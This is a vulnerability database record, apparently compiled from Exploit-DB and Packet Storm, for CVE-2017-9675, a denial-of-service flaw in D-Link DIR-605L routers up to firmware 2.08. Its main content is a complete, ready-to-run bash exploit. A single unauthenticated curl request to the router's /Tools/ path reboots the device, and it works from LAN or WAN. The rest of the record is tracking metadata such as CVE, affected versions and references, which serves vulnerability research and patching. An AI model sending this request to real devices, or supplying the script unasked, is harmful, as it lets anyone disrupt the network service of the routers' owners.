ID
VAR-E-201711-0123
CVE
| cve_id: | CVE-2017-9675 | Trust: 1.5 |
EDB ID
43147
TITLE
D-Link DIR-605L < 2.08 - Denial of Service - Hardware dos Exploit
Trust: 0.6
DESCRIPTION
D-Link DIR-605L < 2.08 - Denial of Service. CVE-2017-9675 . dos exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | d link | model: | dir-605l | scope: | lt | version: | 2.08 | Trust: 1.0 |
| vendor: | d link | model: | dir605l | scope: | - | version: | - | Trust: 0.6 |
| vendor: | d link | model: | dir605l | scope: | eq | version: | 2.08 | Trust: 0.5 |
EXPLOIT
# Exploit Title: D-Link DIR605L <=2.08 Denial of Service via HTTP GET (CVE-2017-9675)
# Date: 2017-11-14
# Exploit Author: Enrique Castillo
# Contact: https://twitter.com/_hyperlogic
# Detailed Analysis: http://hypercrux.com/bug-report/2017/06/19/DIR605L-DoS-BugReport/
# Vendor Homepage: http://us.dlink.com/
# Software Link: specific version no longer available on vendor site
# Version: 2.08UI and prior
# CVE : CVE-2017-9675
# Tested on Linux
###
# Description: Firmware versions 2.08UI and lower contain a bug in the function that handles HTTP GET requests for
# directory paths that can allow an unauthenticated attacker to cause complete denial of service (device reboot). This bug can be triggered
# from both LAN and WAN.
###
#!/usr/bin/env bash
# usage: ./sploit.sh <router_ip>
ROUTER=$1
if [ "$#" -ne 1 ]; then
echo "usage: $0 <router_ip>"
exit
fi
curl http://$ROUTER/Tools/
Trust: 1.0
EXPLOIT LANGUAGE
sh
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Denial of Service
Trust: 1.6
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | web | Trust: 0.5 |
| tag: | denial of service | Trust: 0.5 |
CREDITS
Enrique Castillo
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 43147 | Trust: 1.6 |
| db: | NVD | id: | CVE-2017-9675 | Trust: 1.5 |
| db: | EDBNET | id: | 95061 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 145011 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2017-9675 | Trust: 1.5 |
| url: | https://www.exploit-db.com/exploits/43147/ | Trust: 0.6 |
SOURCES
| db: | PACKETSTORM | id: | 145011 |
| db: | EXPLOIT-DB | id: | 43147 |
| db: | EDBNET | id: | 95061 |
LAST UPDATE DATE
2022-07-27T09:58:23.795000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 145011 | date: | 2017-11-16T00:45:22 |
| db: | EXPLOIT-DB | id: | 43147 | date: | 2017-11-14T00:00:00 |
| db: | EDBNET | id: | 95061 | date: | 2017-11-15T00:00:00 |